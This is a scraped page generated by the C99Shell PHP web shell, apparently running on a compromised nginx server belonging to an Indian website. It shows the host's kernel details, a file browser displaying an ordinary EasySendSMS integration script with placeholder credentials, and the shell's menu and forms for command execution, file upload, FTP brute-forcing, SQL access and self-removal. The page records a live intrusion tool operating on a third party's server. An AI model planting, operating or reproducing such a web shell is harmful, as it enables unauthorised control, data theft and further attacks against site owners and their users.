!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/itce.co.in/data/include/smsapi/   drwxr-xr-x
Free 30.71 GB of 49.93 GB (61.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     easysendsms.php (1.37 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
//* Easy Send SMS Provider
//* https://www.easysendsms.com
//* Change $ESSusername, $ESSpassword, $ESSsender
//* need to add to function runner_post_request following code:
//* $options = array(
//* ...
//* CURLOPT_SSL_VERIFYHOST => false,
//* CURLOPT_SSL_VERIFYPEER => false);

$ESSusername "username";
$ESSpassword "password";
$ESSsender "sender";

function 
runner_sms($number$message$parameters = array())
{
    global 
$ESSusername$ESSpassword$ESSsender;

    if ( !isset(
$parameters["to"]) )
        
$parameters["to"] = $number;

    if ( !isset(
$parameters["text"]) )
        
$parameters["text"] = $message;

    
$parameters["from"] = $ESSsender;

    
$url "https://www.easysendsms.com/sms/bulksms-api/bulksms-api";

    
$headers = array();
    
$parameters["user"] = $ESSusername;
    
$parameters["password"] = $ESSpassword;
    
$parameters["type"] = 0;

    
    
$certPath getabspath('include/cacert.pem');    

    
$result = array();
    
$result["success"] = false;

    
$response runner_post_request($url$parameters$headers$certPath);
    if ( !
$response["error"] )
    {
        
$result["response"] = $response["content"];
        if ( 
substr($result["response"],0,2) == "OK" )
            
$result["success"] = true;
        else
            
$result["error"] = "EasySendSMS error: " $result["response"];
    }
    else
    {
        
$result["error"] = $response["error"];
    }

    return 
$result;
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0022 ]--